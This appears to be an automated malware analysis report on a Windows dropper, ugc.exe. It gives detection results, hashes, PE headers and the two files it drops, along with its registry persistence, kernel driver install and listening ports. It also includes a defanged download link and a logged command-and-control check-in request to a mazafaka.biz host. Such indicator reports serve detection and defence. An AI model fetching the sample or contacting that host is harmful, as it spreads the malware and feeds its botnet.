Download Link: hxxp://xo-host.net/ugc.exe File Name: ugc.exe VirusTotal Result: 10/32 (31.25%) AntiVir 7.6.0.85 2008.04.15 TR/Drop.Agent.qkg Avast 4.8.1169.0 2008.04.15 Win32:Agent-OXU eSafe 7.0.15.0 2008.04.09 suspicious Trojan/Worm Ewido 4.0 2008.04.15 Dropper.Agent.qkg F-Secure 6.70.13260.0 2008.04.15 Trojan-Dropper.Win32.Agent.qkg Ikarus T3.1.1.26.0 2008.04.15 Virus.Win32.Agent.OXU Kaspersky 7.0.0.125 2008.04.15 Trojan-Dropper.Win32.Agent.qkg NOD32v2 3028 2008.04.15 Win32/Spy.Goldun.NCV Sophos 4.28.0 2008.04.15 Mal/EncPk-CO Webwasher-Gateway 6.6.2 2008.04.15 Trojan.Drop.Agent.qkg File Info: File size: 11776 bytes MD5...: d6f34d8f5ccf780cb4113929652cceeb SHA1..: 963f320466199764e18356aff04e76f4848b84ea SHA256: 72cb4c26f082bbf2d4ddf8508ca4c1ab768ae5b532a20bb84d4263c9d31942d8 SHA512: e30ee9ee6ba13cf0b5a9eba56fa4429f2b2c4b7891784557fc9a4cc51425c287 1ad6b0a1aad620684c686f0a56f11c79e2229bacfe760266926c10d6740ab10f PE Structure: Entry Point Address.: 0x40a750 Time Date Stamp.....: 0x468da383 (Fri Jul 06 02:05:55 2007) Machine Type.......: 0x14c (I386) PE Header Signature: 00004550 Machine: 014C - Intel 386 Number of sections: 0003 Time/Date stamp: 468DA383 Pointer to symbol table: 00000000 Number of symbols: 00000000 Size of optional header: 00E0 Characteristics: 010F Magic: 010B Linker version (major): 05 Linker version (minor): 0C Size of code: 00003000 Size of initialized data: 00001000 Size of uninitialized data: 00007000 Address of entry point: 0000A750 Base of code: 00008000 Base of data: 0000B000 Image base: 00400000 Section alignment: 00001000 File alignment: 00000200 OS version (major): 0004 OS version (minor): 0000 Image version (major): 0000 Image version (minor): 0000 Sub system version (major): 0004 Sub system version (minor): 0000 Win32 version: 00000000 Size of image: 0000C000 Size of headers: 00001000 Checksum: 00000000 Sub system: 0002 - Windows graphical user interface (GUI) subsystem DLL characteristics: 0000 Size of stack reserve: 00040000 Size of stack commit: 00001000 Size of heap reserve: 00100000 Size of heap commit: 00001000 Loader flags: 00000000 Number of RVA: 00000010 PE Section: name viradd virsiz rawdsiz ntrpy md5 Section VirtSize VirtAddr PhysSize PhysAddr Flags UPX0 00007000 00001000 00000000 00000200 E0000080 UPX1 00003000 00008000 00002A00 00000200 E0000040 UPX2 00001000 0000B000 00000200 00002C00 C0000040 Import table (libraries: 1) KERNEL32.DLL (imports: 6) LoadLibraryA GetProcAddress VirtualProtect VirtualAlloc VirtualFree ExitProcess When Executed drops the files: C:\WINDOWS\system32\ibudu.dll C:\WINDOWS\system32\itcoe.sys File Name: ibudu.dll File Size: 6672 Bytes MD5: 39DF57F7D411871FFB7538DB4DB6F562 PE Header Signature: 00004550 Machine: 014C - Intel 386 Number of sections: 0003 Time/Date stamp: 4800A698 Pointer to symbol table: 00000000 Number of symbols: 00000000 Size of optional header: 00E0 Characteristics: 210E Magic: 010B Linker version (major): 05 Linker version (minor): 0C Size of code: 00002000 Size of initialized data: 00001000 Size of uninitialized data: 0000D000 Address of entry point: 0000F3B0 Base of code: 0000E000 Base of data: 00010000 Image base: 10000000 Section alignment: 00001000 File alignment: 00000200 OS version (major): 0004 OS version (minor): 0000 Image version (major): 0000 Image version (minor): 0000 Sub system version (major): 0004 Sub system version (minor): 0000 Win32 version: 00000000 Size of image: 00011000 Size of headers: 00001000 Checksum: 00000000 Sub system: 0002 - Windows graphical user interface (GUI) subsystem DLL characteristics: 0000 Size of stack reserve: 00100000 Size of stack commit: 00001000 Size of heap reserve: 00100000 Size of heap commit: 00001000 Loader flags: 00000000 Number of RVA: 00000010 PE Sections Section VirtSize VirtAddr PhysSize PhysAddr Flags UPX0 0000D000 00001000 00000000 00000200 E0000080 UPX1 00002000 0000E000 00001600 00000200 E0000040 UPX2 00001000 00010000 00000200 00001800 C0000040 Export table (names: 1, functions: 1) #0 - ibudu Import table (libraries: 4) KERNEL32.DLL (imports: 5) LoadLibraryA GetProcAddress VirtualProtect VirtualAlloc VirtualFree ADVAPI32.dll (imports: 1) RegCloseKey USER32.dll (imports: 1) wsprintfA WS2_32.dll (imports: 1) #23 File Name: itcoe.sys File Size: 2560 bytes MD5: 323C6379B5AF5B9D763582AE0F3DCA98 PE Header Signature: 00004550 Machine: 014C - Intel 386 Number of sections: 0003 Time/Date stamp: 4800A698 Pointer to symbol table: 00000000 Number of symbols: 00000000 Size of optional header: 00E0 Characteristics: 210E Magic: 010B Linker version (major): 05 Linker version (minor): 0C Size of code: 00002000 Size of initialized data: 00001000 Size of uninitialized data: 0000D000 Address of entry point: 0000F3B0 Base of code: 0000E000 Base of data: 00010000 Image base: 10000000 Section alignment: 00001000 File alignment: 00000200 OS version (major): 0004 OS version (minor): 0000 Image version (major): 0000 Image version (minor): 0000 Sub system version (major): 0004 Sub system version (minor): 0000 Win32 version: 00000000 Size of image: 00011000 Size of headers: 00001000 Checksum: 00000000 Sub system: 0002 - Windows graphical user interface (GUI) subsystem DLL characteristics: 0000 Size of stack reserve: 00100000 Size of stack commit: 00001000 Size of heap reserve: 00100000 Size of heap commit: 00001000 Loader flags: 00000000 Number of RVA: 00000010 PE Sections Section VirtSize VirtAddr PhysSize PhysAddr Flags UPX0 0000D000 00001000 00000000 00000200 E0000080 UPX1 00002000 0000E000 00001600 00000200 E0000040 UPX2 00001000 00010000 00000200 00001800 C0000040 Export table (names: 1, functions: 1) #0 - ibudu Import table (libraries: 4) KERNEL32.DLL (imports: 5) LoadLibraryA GetProcAddress VirtualProtect VirtualAlloc VirtualFree ADVAPI32.dll (imports: 1) RegCloseKey USER32.dll (imports: 1) Process Details: Filename: ugc.exe MD5: d6f34d8f5ccf780cb4113929652cceeb SHA-1: 963f320466199764e18356aff04e76f4848b84ea File Size: 11776 Bytes Registry Values Added: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\ibudu HKLM\SYSTEM\CurrentControlSet\Services\VFILT HKLM\SYSTEM\CurrentControlSet\Services\ccEvtMgr HKLM\SYSTEM\CurrentControlSet\Services\ccPwdSvc HKLM\SYSTEM\CurrentControlSet\Services\ccPxySvc HKLM\SYSTEM\CurrentControlSet\Services\NISUM HKLM\SYSTEM\CurrentControlSet\Services\SymEvent HKLM\SYSTEM\CurrentControlSet\Services\SYMTDI HKLM\System\CurrentControlSet\Services\itcoe HKLM\System\CurrentControlSet\Services\itcoe\Security Registry Values Read: Key Name Value Times HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\ibudu psmod 6BBD8036ACF502DA366B 2 HKLM\SYSTEM\CONTROLSET001\SERVICES\TCPIP\LINKAGE Bind 0x5c004400650076006900630065005c007b00420032004200350031003000 442 HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{B2B51064-BBF5-4528-B62B-E6D62A782874} DhcpServer 255.255.255.255 442 HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{B2B51064-BBF5-4528-B62B-E6D62A782874} EnableDHCP 0 221 HKLM\System\CurrentControlSet\Services\WinSock2\Parameters WinSock_Registry_Version 2.0 2 HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5 Num_Catalog_Entries 3 1 HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5 Serial_Access_Num 4 2 HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001 DisplayString Tcpip 4 HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001 Enabled 1 1 HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001 LibraryPath %SystemRoot%\System32\mswsock.dll 2 HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001 ProviderId 0x409d05229e7ecf11ae5a00aa00a7112b 1 HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001 StoresServiceClassInfo 0 1 HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001 SupportedNameSpace 12 1 HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001 Version 0 1 HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002 DisplayString NTDS 4 HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002 Enabled 1 1 HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002 LibraryPath %SystemRoot%\System32\winrnr.dll 2 HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002 ProviderId 0xee37263b80e5cf11a55500c04fd8d4ac 1 HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002 StoresServiceClassInfo 0 1 HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002 SupportedNameSpace 32 1 HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002 Version 0 1 HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003 DisplayString Network Location Awareness (NLA) Namespace 4 HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003 Enabled 1 1 HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003 LibraryPath %SystemRoot%\System32\mswsock.dll 2 HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003 ProviderId 0x3a244266a83ba64abaa52e0bd71fdd83 1 HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003 StoresServiceClassInfo 0 1 HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003 SupportedNameSpace 15 1 HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003 Version 0 1 HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9 Next_Catalog_Entry_ID 1012 1 HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9 Num_Catalog_Entries 11 1 HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9 Serial_Access_Num 4 2 HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000001 PackedCatalogItem %SystemRoot%\system32\mswsock. 1 HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000002 PackedCatalogItem %SystemRoot%\system32\mswsock. 1 HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000003 PackedCatalogItem %SystemRoot%\system32\mswsock. 1 HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000004 PackedCatalogItem %SystemRoot%\system32\rsvpsp.d 1 HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000005 PackedCatalogItem %SystemRoot%\system32\rsvpsp.d 1 HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000006 PackedCatalogItem %SystemRoot%\system32\mswsock. 1 HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000007 PackedCatalogItem %SystemRoot%\system32\mswsock. 1 HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000008 PackedCatalogItem %SystemRoot%\system32\mswsock. 1 HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000009 PackedCatalogItem %SystemRoot%\system32\mswsock. 1 HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000010 PackedCatalogItem %SystemRoot%\system32\mswsock. 1 HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000011 PackedCatalogItem %SystemRoot%\system32\mswsock. HKLM\SYSTEM\CONTROLSET001\SERVICES\itcoe\Enum 0 Root\LEGACY_ITCOE\0000 1 HKLM\SYSTEM\CONTROLSET001\SERVICES\itcoe\Enum Registry Values Changed: Key Name New Value HKLM\System\CurrentControlSet\Services\itcoe DisplayName itcoe adapter HKLM\System\CurrentControlSet\Services\itcoe ErrorControl 0 HKLM\System\CurrentControlSet\Services\itcoe ImagePath \??\C:\WINDOWS\system32\itcoe.sys HKLM\System\CurrentControlSet\Services\itcoe Start 1 HKLM\System\CurrentControlSet\Services\itcoe Type 1 HKLM\System\CurrentControlSet\Services\itcoe\Security Security 0x01001480900000009c000000140000003000000002001c00010000000280 Drivers Loaded: HKLM\System\CurrentControlSet\Services\itcoe Network Activity: Port Type Status 53626 tcp Listening 36071 tcp Listening HTTP Connection: From SandBox:1034 to 69.50.160.21:80 - [artmaza.mazafaka.biz] Request: GET /gt8.php?tma=&mode=7665723D50533726736F636B73706F72743D35333632362669643D31393034382668747470706F72743D333630373126757074696D656D3D3326757074696D65683D30267569643D3642424438303336414346353032444133363642 Response: 200 "OK"